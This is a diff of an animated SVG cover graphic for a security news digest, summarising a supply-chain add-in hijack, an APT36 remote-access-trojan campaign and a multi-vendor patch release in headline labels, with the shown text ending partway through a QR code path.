+    <!-- Credential dots radiating -->
+    <g fill="#E63946">
+      <circle cx="-62" cy="-8" r="3.5" opacity="0.7"/>
+      <circle cx="68" cy="-14" r="3.5"><animate attributeName="opacity" values="0.2;1;0.2" dur="1.9s" begin="0.3s" repeatCount="indefinite"/></circle>
+      <circle cx="-68" cy="18" r="3.5" opacity="0.7"/>
+      <circle cx="62" cy="22" r="3.5"><animate attributeName="opacity" values="0.2;1;0.2" dur="1.7s" begin="0.9s" repeatCount="indefinite"/></circle>
+    </g>
+    <g stroke="#E63946" stroke-width="1" stroke-dasharray="3 3" fill="none" opacity="0.6">
+      <line x1="-40" y1="-2" x2="-62" y2="-8"/>
+      <line x1="40" y1="-8" x2="68" y2="-14"/>
+      <line x1="-40" y1="8" x2="-68" y2="18"/>
+      <line x1="40" y1="8" x2="62" y2="22"/>
+    </g>
   </g>
-  <text x="80" y="44" font-family="Arial,sans-serif" font-size="28" font-weight="700" fill="#f1f5f9">Security Weekly Digest</text>
-  <rect x="990" y="18" width="178" height="44" rx="6" fill="#1e293b" stroke="#334155" stroke-width="1"/>
-  <text x="1079" y="48" font-family="Arial,sans-serif" font-size="15" font-weight="700" fill="#94a3b8" text-anchor="middle">February 12, 2026</text>
-
-  <!-- Card 1: APT36 -->
-  <rect x="32" y="100" width="220" height="120" rx="8" fill="#1a0505" stroke="#ef4444" stroke-width="1.5"/>
-  <circle cx="52" cy="120" r="6" fill="#ef4444"/>
-  <g transform="translate(142,148)">
-    <ellipse cx="0" cy="-4" rx="14" ry="9" fill="none" stroke="#ef4444" stroke-width="1.8"/><circle cx="0" cy="-4" r="4" fill="#ef4444" opacity="0.7"/>
+  <!-- 3-step attack chain -->
+  <g transform="translate(28,210)">
+    <rect x="0" y="0" width="280" height="34" rx="6" fill="#0A1B2E" stroke="#3A86FF" stroke-width="1.2"/>
+    <circle cx="18" cy="17" r="7" fill="#3A86FF"/>
+    <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#FFFFFF">1</text>
+    <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#F5F7FA">Trusted add-in domain hijack</text>
+    <line x1="18" y1="38" x2="18" y2="50" stroke="#3A86FF" stroke-width="1.4" stroke-dasharray="2 2"/>
+    <g transform="translate(0,54)">
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#0A1B2E" stroke="#3A86FF" stroke-width="1.2"/>
+      <circle cx="18" cy="17" r="7" fill="#3A86FF"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#FFFFFF">2</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#F5F7FA">Fake login page redirect</text>
+    </g>
+    <line x1="18" y1="92" x2="18" y2="104" stroke="#3A86FF" stroke-width="1.4" stroke-dasharray="2 2"/>
+    <g transform="translate(0,108)">
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#12283F" stroke="#8FB8FF" stroke-width="1.4"/>
+      <circle cx="18" cy="17" r="7" fill="#8FB8FF"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#0A1020">3</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="800" fill="#F5F7FA">4,000+ accounts compromised</text>
+    </g>
   </g>
-  <text x="142" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#ef4444" text-anchor="middle">APT36</text>
-  <!-- Card 2: SEC OPS -->
-  <rect x="268" y="100" width="220" height="120" rx="8" fill="#1a0d0d" stroke="#f59e0b" stroke-width="1.5"/>
-  <circle cx="288" cy="120" r="6" fill="#f59e0b"/>
-  <g transform="translate(378,148)">
-    <path d="M0,-16 L14,-8 L14,4 C14,12 8,16 0,20 C-8,16 -14,12 -14,4 L-14,-8 Z" fill="none" stroke="#f59e0b" stroke-width="1.8"/>
+  <!-- KPI pill -->
+  <g transform="translate(28,336)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="280" height="32" rx="8" fill="#12283F" stroke="#3A86FF" stroke-width="1.6"/>
+    <text x="14" y="21" font-family="Inter, monospace" font-size="11" font-weight="700" fill="#8FB8FF">ATT&amp;CK</text>
+    <text x="140" y="22" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="14" font-weight="900" fill="#F5F7FA">T1195</text>
+    <text x="266" y="21" text-anchor="end" font-family="Inter, monospace" font-size="10" font-weight="700" fill="#8FB8FF">SUPPLY CHAIN</text>
   </g>
-  <text x="378" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#f59e0b" text-anchor="middle">SEC OPS</text>
-  <!-- Card 3: CLOUD SEC -->
-  <rect x="504" y="100" width="220" height="120" rx="8" fill="#0a1020" stroke="#3b82f6" stroke-width="1.5"/>
-  <circle cx="524" cy="120" r="6" fill="#3b82f6"/>
-  <g transform="translate(614,148)">
-    <path d="M-16,8 C-24,8 -26,-2 -20,-8 C-18,-18 -6,-22 4,-18 C8,-26 20,-26 24,-16 C30,-16 32,-8 28,0 C26,8 16,8 8,8 Z" fill="none" stroke="#3b82f6" stroke-width="1.8" transform="scale(0.65)"/>
+</g>
+
+<!-- COL B: APT36 / SideCopy RAT (Feb 09) amber -->
+<g transform="translate(432,216)">
+  <rect x="0" y="0" width="336" height="374" rx="14" fill="url(#colB)" stroke="#FFB703" stroke-width="1.6" opacity="0.97"/>
+  <rect x="0" y="0" width="336" height="4" fill="#FFB703" opacity="0.7"/>
+  <g filter="url(#textShadow)">
+    <text x="20" y="28" font-family="Inter, Helvetica, Arial, sans-serif" font-size="11" font-weight="700" fill="#FFB703" letter-spacing="2.4">HIGH  /  APT CAMPAIGN</text>
+    <text x="20" y="54" font-family="Inter, Helvetica, Arial, sans-serif" font-size="20" font-weight="800" fill="#F5F7FA">APT36 / SideCopy RAT</text>
+    <text x="20" y="76" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="500" fill="#FFD58A">Cross-platform India govt target</text>
   </g>
-  <text x="614" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#3b82f6" text-anchor="middle">CLOUD SEC</text>
-  <!-- Card 4: THREAT INT -->
-  <rect x="740" y="100" width="200" height="120" rx="8" fill="#071a10" stroke="#22c55e" stroke-width="1.5"/>
-  <circle cx="760" cy="120" r="6" fill="#22c55e"/>
-  <g transform="translate(840,148)">
-    <path d="M0,-16 L14,-8 L14,4 C14,12 8,16 0,20 C-8,16 -14,12 -14,4 L-14,-8 Z" fill="none" stroke="#22c55e" stroke-width="1.8"/>
+  <!-- Scene: attacker server + crosshair target -->
+  <g transform="translate(168,138)">
+    <g filter="url(#softShadow)">
+      <rect x="-74" y="-22" width="48" height="40" rx="4" fill="#2E1A0A" stroke="#FFB703" stroke-width="1.6"/>
+      <text x="-50" y="-6" text-anchor="middle" font-family="Inter, monospace" font-size="6" font-weight="800" fill="#FFB703">APT36</text>
+      <rect x="-66" y="-2" width="32" height="4" rx="1" fill="#FFB703" opacity="0.6"/>
+      <rect x="-66" y="4" width="22" height="4" rx="1" fill="#FFB703" opacity="0.4"/>
+      <rect x="-66" y="10" width="28" height="4" rx="1" fill="#FFB703" opacity="0.3"/>
+    </g>
+    <!-- RAT payload arrow -->
+    <g stroke="#FFB703" stroke-width="2" fill="none">
+      <line x1="-24" y1="0" x2="24" y2="0" stroke-dasharray="6 4">
+        <animate attributeName="stroke-dashoffset" values="20;0" dur="1.2s" repeatCount="indefinite"/>
+      </line>
+    </g>
+    <path d="M20,-5 L28,0 L20,5" fill="#FFB703"/>
+    <!-- Crosshair target -->
+    <g filter="url(#softShadow)">
+      <circle cx="58" cy="0" r="26" fill="none" stroke="#E63946" stroke-width="2">
+        <animate attributeName="r" values="22;30;22" dur="2.5s" repeatCount="indefinite"/>
+        <animate attributeName="stroke-opacity" values="0.6;1;0.6" dur="2.5s" repeatCount="indefinite"/>
+      </circle>
+      <circle cx="58" cy="0" r="14" fill="none" stroke="#FFB703" stroke-width="1.4"/>
+      <circle cx="58" cy="0" r="5" fill="#E63946">
+        <animate attributeName="opacity" values="0.5;1;0.5" dur="1.3s" repeatCount="indefinite"/>
+      </circle>
+      <line x1="28" y1="0" x2="46" y2="0" stroke="#E63946" stroke-width="1.2"/>
+      <line x1="70" y1="0" x2="88" y2="0" stroke="#E63946" stroke-width="1.2"/>
+      <line x1="58" y1="-30" x2="58" y2="-16" stroke="#E63946" stroke-width="1.2"/>
+      <line x1="58" y1="16" x2="58" y2="32" stroke="#E63946" stroke-width="1.2"/>
+      <text x="58" y="50" text-anchor="middle" font-family="Inter, monospace" font-size="7" font-weight="800" fill="#FFD58A">INDIA GOVT</text>
+    </g>
   </g>
-  <text x="840" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#22c55e" text-anchor="middle">THREAT INT</text>
-  <!-- Card 5: AI AGENT -->
-  <rect x="956" y="100" width="212" height="120" rx="8" fill="#071a20" stroke="#22d3ee" stroke-width="1.5"/>
-  <circle cx="976" cy="120" r="6" fill="#22d3ee"/>
-  <g transform="translate(1062,148)">
-    <circle cx="-12" cy="-8" r="4" fill="none" stroke="#22d3ee" stroke-width="1.5"/><circle cx="12" cy="-8" r="4" fill="none" stroke="#22d3ee" stroke-width="1.5"/><circle cx="0" cy="8" r="5" fill="none" stroke="#22d3ee" stroke-width="1.8"/><line x1="-8" y1="-6" x2="-2" y2="6" stroke="#22d3ee" stroke-width="1.2" opacity="0.7"/><line x1="8" y1="-6" x2="2" y2="6" stroke="#22d3ee" stroke-width="1.2" opacity="0.7"/><line x1="-8" y1="-8" x2="8" y2="-8" stroke="#22d3ee" stroke-width="1.2" opacity="0.5"/>
+  <!-- 3-step attack chain -->
+  <g transform="translate(28,210)">
+    <rect x="0" y="0" width="280" height="34" rx="6" fill="#1E1006" stroke="#FFB703" stroke-width="1.2"/>
+    <circle cx="18" cy="17" r="7" fill="#FFB703"/>
+    <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#1A1202">1</text>
+    <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#F5F7FA">Spear-phish lure delivery</text>
+    <line x1="18" y1="38" x2="18" y2="50" stroke="#FFB703" stroke-width="1.4" stroke-dasharray="2 2"/>
+    <g transform="translate(0,54)">
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#1E1006" stroke="#FFB703" stroke-width="1.2"/>
+      <circle cx="18" cy="17" r="7" fill="#FFB703"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#1A1202">2</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#F5F7FA">Cross-platform RAT install</text>
+    </g>
+    <line x1="18" y1="92" x2="18" y2="104" stroke="#FFB703" stroke-width="1.4" stroke-dasharray="2 2"/>
+    <g transform="translate(0,108)">
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#2A1A06" stroke="#FFD58A" stroke-width="1.4"/>
+      <circle cx="18" cy="17" r="7" fill="#FFD58A"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#1A1202">3</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="800" fill="#F5F7FA">C2 exfil + persistence</text>
+    </g>
   </g>
-  <text x="1062" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#22d3ee" text-anchor="middle">AI AGENT</text>
-
-  <!-- Threat map area -->
-  <rect x="32" y="240" width="1136" height="220" rx="10" fill="#0c1220" stroke="#1e293b" stroke-width="1"/>
-
-  <!-- Ambient dots -->
-  <g opacity="0.25">
-    <circle cx="180" cy="330" r="2" fill="#94a3b8"/><circle cx="200" cy="340" r="2" fill="#94a3b8"/>
-    <circle cx="550" cy="310" r="2" fill="#94a3b8"/><circle cx="570" cy="325" r="2" fill="#94a3b8"/>
-    <circle cx="750" cy="320" r="2" fill="#94a3b8"/><circle cx="900" cy="330" r="2" fill="#94a3b8"/>
-    <circle cx="350" cy="350" r="2" fill="#94a3b8"/><circle cx="1000" cy="340" r="2" fill="#94a3b8"/>
+  <!-- KPI pill -->
+  <g transform="translate(28,336)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="280" height="32" rx="8" fill="#2A1A06" stroke="#FFB703" stroke-width="1.6"/>
+    <text x="14" y="21" font-family="Inter, monospace" font-size="11" font-weight="700" fill="#FFB703">GROUP</text>
+    <text x="140" y="22" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="14" font-weight="900" fill="#F5F7FA">APT36</text>
+    <text x="266" y="21" text-anchor="end" font-family="Inter, monospace" font-size="10" font-weight="700" fill="#FFD58A">SIDEWINDER</text>
   </g>
-  <!-- Node: APT36 -->
-  <circle cx="170" cy="340" r="22" fill="#1a0505" stroke="#ef4444" stroke-width="2"/>
-  <text x="170" y="344" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#ef4444" text-anchor="middle">APT36</text>
-  <!-- Node: SEC OPS -->
-  <circle cx="370" cy="350" r="20" fill="#1a0d0d" stroke="#f59e0b" stroke-width="2"/>
-  <text x="370" y="354" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#f59e0b" text-anchor="middle">SEC</text>
-  <!-- Node: CLOUD SEC -->
-  <circle cx="580" cy="330" r="22" fill="#0a1020" stroke="#3b82f6" stroke-width="2"/>
-  <text x="580" y="334" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#3b82f6" text-anchor="middle">CLOU</text>
-  <!-- Node: THREAT INT -->
-  <circle cx="780" cy="355" r="18" fill="#071a10" stroke="#22c55e" stroke-width="2"/>
-  <text x="780" y="359" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#22c55e" text-anchor="middle">THRE</text>
-  <!-- Node: AI AGENT -->
-  <circle cx="980" cy="340" r="22" fill="#071a20" stroke="#22d3ee" stroke-width="2"/>
-  <text x="980" y="344" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#22d3ee" text-anchor="middle">AI</text>
-  <line x1="192" y1="340" x2="350" y2="350" stroke="#ef4444" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="390" y1="350" x2="558" y2="330" stroke="#f59e0b" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="602" y1="330" x2="762" y2="355" stroke="#3b82f6" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="798" y1="355" x2="958" y2="340" stroke="#22c55e" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
+</g>
 
-  <!-- Footer -->
-  <rect x="0" y="472" width="1200" height="158" fill="#080c18" opacity="0.95"/>
-  <rect x="0" y="472" width="1200" height="2" fill="#1e293b"/>
+<!-- COL C: 60+ Vendor Patch Wave (Feb 12) red -->
+<g transform="translate(792,216)">
+  <rect x="0" y="0" width="336" height="374" rx="14" fill="url(#colC)" stroke="#E63946" stroke-width="1.6" opacity="0.97"/>
+  <rect x="0" y="0" width="336" height="4" fill="#E63946" opacity="0.7"/>
+  <g filter="url(#textShadow)">
+    <text x="20" y="28" font-family="Inter, Helvetica, Arial, sans-serif" font-size="11" font-weight="700" fill="#FCA5A5" letter-spacing="2.4">HIGH  /  PATCH TUESDAY</text>
+    <text x="20" y="54" font-family="Inter, Helvetica, Arial, sans-serif" font-size="20" font-weight="800" fill="#F5F7FA">60+ Vendor Patch Wave</text>
+    <text x="20" y="76" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="500" fill="#FCA5A5">OS-wide critical CVE release</text>
+  </g>
+  <!-- Scene: shield + concentric pulse rings + count -->
+  <g transform="translate(168,138)">
+    <circle cx="0" cy="0" r="50" fill="none" stroke="#E63946" stroke-width="1" opacity="0.4">
+      <animate attributeName="r" values="40;62;40" dur="3.2s" repeatCount="indefinite"/>
+      <animate attributeName="opacity" values="0.5;0.1;0.5" dur="3.2s" repeatCount="indefinite"/>
+    </circle>
+    <circle cx="0" cy="0" r="38" fill="none" stroke="#E63946" stroke-width="1.2" opacity="0.6">
+      <animate attributeName="r" values="30;48;30" dur="2.6s" begin="0.5s" repeatCount="indefinite"/>
+      <animate attributeName="opacity" values="0.6;0.2;0.6" dur="2.6s" begin="0.5s" repeatCount="indefinite"/>
+    </circle>
+    <g filter="url(#softShadow)">
+      <path d="M0,-30 L26,0 L26,16 Q26,30 0,38 Q-26,30 -26,16 L-26,0 Z" fill="#1E0A12" stroke="#E63946" stroke-width="2.2"/>
+      <path d="M0,-22 L18,2 L18,14 Q18,24 0,30 Q-18,24 -18,14 L-18,2 Z" fill="none" stroke="#FCA5A5" stroke-width="1" opacity="0.5"/>
+      <text x="0" y="2" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="18" font-weight="900" fill="#F5F7FA">60+</text>
+      <text x="0" y="22" text-anchor="middle" font-family="Inter, monospace" font-size="7" font-weight="700" fill="#FCA5A5">VENDORS</text>
+    </g>
+    <g fill="#FCA5A5">
+      <circle cx="0" cy="-48" r="3"><animate attributeName="opacity" values="0.3;1;0.3" dur="1.4s" repeatCount="indefinite"/></circle>
+      <circle cx="42" cy="-24" r="3"><animate attributeName="opacity" values="0.3;1;0.3" dur="1.8s" begin="0.2s" repeatCount="indefinite"/></circle>
+      <circle cx="46" cy="18" r="3"><animate attributeName="opacity" values="0.3;1;0.3" dur="2.0s" begin="0.4s" repeatCount="indefinite"/></circle>
+      <circle cx="-42" cy="-24" r="3"><animate attributeName="opacity" values="0.3;1;0.3" dur="1.6s" begin="0.6s" repeatCount="indefinite"/></circle>
+      <circle cx="-46" cy="18" r="3"><animate attributeName="opacity" values="0.3;1;0.3" dur="1.9s" begin="0.8s" repeatCount="indefinite"/></circle>
+    </g>
+  </g>
+  <!-- 3-step response chain -->
+  <g transform="translate(28,210)">
+    <rect x="0" y="0" width="280" height="34" rx="6" fill="#1E0A12" stroke="#E63946" stroke-width="1.2"/>
+    <circle cx="18" cy="17" r="7" fill="#E63946"/>
+    <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#FFFFFF">1</text>
+    <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#F5F7FA">Coordinated vuln disclosure</text>
+    <line x1="18" y1="38" x2="18" y2="50" stroke="#E63946" stroke-width="1.4" stroke-dasharray="2 2"/>
+    <g transform="translate(0,54)">
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#1E0A12" stroke="#E63946" stroke-width="1.2"/>
+      <circle cx="18" cy="17" r="7" fill="#E63946"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#FFFFFF">2</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#F5F7FA">Critical CVE patches released</text>
+    </g>
+    <line x1="18" y1="92" x2="18" y2="104" stroke="#E63946" stroke-width="1.4" stroke-dasharray="2 2"/>
+    <g transform="translate(0,108)">
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#2A0A14" stroke="#FCA5A5" stroke-width="1.4"/>
+      <circle cx="18" cy="17" r="7" fill="#FCA5A5"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#1A0208">3</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="800" fill="#F5F7FA">Apply patches within 7 days</text>
+    </g>
+  </g>
+  <!-- KPI pill -->
+  <g transform="translate(28,336)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="280" height="32" rx="8" fill="#2A0A14" stroke="#E63946" stroke-width="1.6"/>
+    <text x="14" y="21" font-family="Inter, monospace" font-size="11" font-weight="700" fill="#FCA5A5">SCOPE</text>
+    <text x="140" y="22" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="14" font-weight="900" fill="#F5F7FA">60+ VENDORS</text>
+    <text x="266" y="21" text-anchor="end" font-family="Inter, monospace" font-size="10" font-weight="700" fill="#FCA5A5">MULTI-OS</text>
+  </g>
+</g>
 
-  <!-- Tags -->
-  <rect x="32" y="490" width="80" height="24" rx="4" fill="#1a0505" stroke="#ef4444" stroke-width="1"/>
-  <text x="72" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#ef4444" text-anchor="middle">APT36</text>
-  <rect x="124" y="490" width="83" height="24" rx="4" fill="#1a0d0d" stroke="#f59e0b" stroke-width="1"/>
-  <text x="165" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#f59e0b" text-anchor="middle">SEC OPS</text>
-  <rect x="219" y="490" width="101" height="24" rx="4" fill="#0a1020" stroke="#3b82f6" stroke-width="1"/>
-  <text x="269" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#3b82f6" text-anchor="middle">CLOUD SEC</text>
-  <rect x="332" y="490" width="110" height="24" rx="4" fill="#071a10" stroke="#22c55e" stroke-width="1"/>
-  <text x="387" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#22c55e" text-anchor="middle">THREAT INT</text>
-  <rect x="454" y="490" width="92" height="24" rx="4" fill="#071a20" stroke="#22d3ee" stroke-width="1"/>
-  <text x="500" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#22d3ee" text-anchor="middle">AI AGENT</text>
+<!-- Footer strip -->
+<rect x="0" y="607" width="1200" height="23" fill="#050813" opacity="0.88"/>
+<text x="36" y="622" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="600" fill="#4A6AA0" letter-spacing="1.5">DEVSECOPS WEEKLY  |  TWODRAGON  |  TECH.2TWODRAGON.COM</text>
+<text x="1164" y="622" text-anchor="end" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="600" fill="#4A6AA0" letter-spacing="1">SECURITY  /  CLOUD  /  AI</text>
 
-  <!-- Bottom bar -->
-  <circle cx="32" cy="545" r="4" fill="#ef4444" opacity="0.6"/>
-  <text x="46" y="550" font-family="Arial,sans-serif" font-size="12" fill="#475569">Security Weekly Digest | February 12, 2026</text>
-  <text x="1168" y="550" font-family="Arial,sans-serif" font-size="12" fill="#475569" text-anchor="end">tech.2twodragon.com</text>
+<!-- cover-qr: https://tech.2twodragon.com/posts/2026/02/12/Tech_Security_Weekly_Digest_AI_Cloud_Security_Agent/ : 41x41 -->
+<g transform="translate(1080,504)" filter="url(#softShadow)">
+  <rect x="-8" y="-8" width="100" height="100" rx="6" fill="#FFFFFF"/>
+  <g transform="scale(2.048780)" fill="#0A1020">
+    <path d="M0 0h7v1h-7zM14 0h1v1h-1zM17 0h3v1h-3zM26 0h2v1h-2zM30 0h2v1h-2zM34 0h7v1h-7zM0 1h1v1h-1zM6 1h1v1h-1zM12 1h2v1h-2zM16 1h1v1h-1zM18 1h1v1h-1zM20 1h4v1h-4zM26 1h5v1h-5zM32 1h1v1h-1zM34 1h1v1h-1zM40 1h1v1h-1zM0 2h1v1h-1zM2 2h3v1h-3zM6 2h1v1h-1zM13 2h1v1h-1zM16 2h1v1h-1zM18 2h2v1h-2zM23 2h1v1h-1zM26 2h1v1h-1zM29 2h2v1h-2zM32 2h1v1h-1zM34 2h1v1h-1zM36 2h3v1h-3zM40 2h1v1h-1zM0 3h1v1h-1zM2 3h3v1h-3zM6 3h1v1h-1zM12 3h1v1h-1zM14 3h8v1h-8zM23 3h2v1h-2zM26 3h3v1h-3zM30 3h3v1h-3zM34 3h1v1h-1zM36 3h3v1h-3zM40 3h1v1h-1zM0 4h1v1h-1zM2 4h3v1h-3zM6 4h1v1h-1zM9 4h3v1h-3zM17 4h3v1h-3zM22 4h1v1h-1zM25 4h3v1h-3zM32 4h1v1h-1zM34 4h1v1h-1zM36 4h3v1h-3zM40 4h1v1h-1zM0 5h1v1h-1zM6 5h1v1h-1zM8 5h1v1h-1zM11 5h3v1h-3zM15 5h1v1h-1zM17 5h3v1h-3zM24 5h1v1h-1zM26 5h2v1h-2zM30 5h3v1h-3zM34 5h1v1h-1zM40 5h1v1h-1zM0 6h7v1h-7zM8 6h1v1h-1zM10 6h1v1h-1zM12 6h1v1h-1zM14 6h1v1h-1zM16 6h1v1h-1zM18 6h1v1h-1zM20 6h1v1h-1zM22 6h1v1h-1zM24 6h1v1h-1zM26 6h1v1h-1zM28 6h1v1h-1zM30 6h1v1h-1zM32 6h1v1h-1zM34 6h7v1h-7zM9 7h2v1h-2zM12 7h2v1h-2zM17 7h1v1h-1zM19 7h4v1h-4zM24 7h1v1h-1zM27 7h3v1h-3zM31 7h1v1h-1zM0 8h1v1h-1zM3 8h1v1h-1zM5 8h2v1h-2zM8 8h1v1h-1zM11 8h1v1h-1zM15 8h2v1h-2zM19 8h1v1h-1zM21 8h1v1h-1zM25 8h2v1h-2zM32 8h2v1h-2zM35 8h1v1h-1zM1 9h1v1h-1zM3 9h1v1h-1zM7 9h3v1h-3zM12 9h3v1h-3zM16 9h2v1h-2zM21 9h1v1h-1zM24 9h3v1h-3zM29 9h1v1h-1zM32 9h1v1h-1zM37 9h2v1h-2zM1 10h4v1h-4zM6 10h1v1h-1zM9 10h2v1h-2zM15 10h6v1h-6zM22 10h1v1h-1zM24 10h1v1h-1zM26 10h1v1h-1zM30 10h2v1h-2zM35 10h5v1h-5zM0 11h1v1h-1zM2 11h4v1h-4zM8 11h1v1h-1zM10 11h3v1h-3zM14 11h1v1h-1zM16 11h1v1h-1zM18 11h1v1h-1zM21 11h1v1h-1zM24 11h3v1h-3zM28 11h1v1h-1zM34 11h1v1h-1zM36 11h1v1h-1zM38 11h2v1h-2zM1 12h1v1h-1zM6 12h4v1h-4zM11 12h4v1h-4zM16 12h2v1h-2zM19 12h1v1h-1zM21 12h1v1h-1zM24 12h8v1h-8zM33 12h3v1h-3zM37 12h1v1h-1zM39 12h2v1h-2zM0 13h6v1h-6zM7 13h4v1h-4zM12 13h5v1h-5zM22 13h4v1h-4zM30 13h3v1h-3zM37 13h2v1h-2zM1 14h4v1h-4zM6 14h1v1h-1zM8 14h1v1h-1zM10 14h1v1h-1zM12 14h1v1h-1zM14 14h2v1h-2zM17 14h1v1h-1zM20 14h2v1h-2zM24 14h1v1h-1zM30 14h1v1h-1zM32 14h1v1h-1zM34 14h1v1h-1zM37 14h4v1h-4zM0 15h3v1h-3zM4 15h1v1h-1zM7 15h1v1h-1zM9 15h1v1h-1zM17 15h1v1h-1zM19 15h1v1h-1zM21 15h2v1h-2zM24 15h3v1h-3zM28 15h4v1h-4zM34 15h2v1h-2zM0 16h2v1h-2zM5 16h5v1h-5zM12 16h2v1h-2zM15 16h3v1h-3zM19 16h2v1h-2zM22 16h2v1h-2zM29 16h1v1h-1zM32 16h1v1h-1zM35 16h1v1h-1zM39 16h1v1h-1zM0 17h4v1h-4zM7 17h1v1h-1zM10 17h2v1h-2zM14 17h3v1h-3zM19 17h1v1h-1zM23 17h2v1h-2zM26 17h4v1h-4zM34 17h2v1h-2zM37 17h4v1h-4zM1 18h1v1h-1zM3 18h2v1h-2zM6 18h2v1h-2zM9 18h2v1h-2zM13 18h3v1h-3zM18 18h1v1h-1zM21 18h1v1h-1zM25 18h1v1h-1zM30 18h1v1h-1zM33 18h2v1h-2zM36 18h1v1h-1zM40 18h1v1h-1zM0 19h1v1h-1zM7 19h2v1h-2zM10 19h1v1h-1zM12 19h2v1h-2zM15 19h1v1h-1zM17 19h4v1h-4zM22 19h1v1h-1zM29 19h2v1h-2zM32 19h4v1h-4zM37 19h1v1h-1zM40 19h1v1h-1zM1 20h1v1h-1zM3 20h2v1h-2zM6 20h3v1h-3zM11 20h3v1h-3zM16 20h5v1h-5zM23 20h5v1h-5zM29 20h1v1h-1zM32 20h4v1h-4zM38 20h2v1h-2zM2 21h4v1h-4zM10 21h1v1h-1zM12 21h1v1h-1zM15 21h7v1h-7zM25 21h2v1h-2zM29 21h2v1h-2zM34 21h1v1h-1zM38 21h3v1h-3zM0 22h2v1h-2zM3 22h2v1h-2zM6 22h2v1h-2zM9 22h3v1h-3zM13 22h2v1h-2zM16 22h5v1h-5zM24 22h2v1h-2zM28 22h1v1h-1zM31 22h1v1h-1zM33 22h4v1h-4zM39 22h1v1h-1zM0 23h1v1h-1zM2 23h4v1h-4zM10 23h1v1h-1zM14 23h1v1h-1zM18 23h6v1h-6zM25 23h2v1h-2zM28 23h1v1h-1zM30 23h1v1h-1zM34 23h2v1h-2zM38 23h1v1h-1zM0 24h1v1h-1zM2 24h2v1h-2zM5 24h3v1h-3zM10 24h2v1h-2zM15 24h3v1h-3zM19 24h3v1h-3zM24 24h2v1h-2zM27 24h3v1h-3zM31 24h5v1h-5zM37 24h2v1h-2zM40 24h1v1h-1zM0 25h1v1h-1zM2 25h4v1h-4zM11 25h1v1h-1zM13 25h5v1h-5zM19 25h4v1h-4zM24 25h3v1h-3zM28 25h2v1h-2zM31 25h1v1h-1zM34 25h1v1h-1zM37 25h1v1h-1zM39 25h1v1h-1zM1 26h1v1h-1zM5 26h2v1h-2zM8 26h5v1h-5zM15 26h3v1h-3zM20 26h1v1h-1zM23 26h1v1h-1zM25 26h2v1h-2zM28 26h1v1h-1zM30 26h1v1h-1zM32 26h5v1h-5zM39 26h2v1h-2zM4 27h1v1h-1zM7 27h1v1h-1zM9 27h3v1h-3zM13 27h1v1h-1zM16 27h3v1h-3zM20 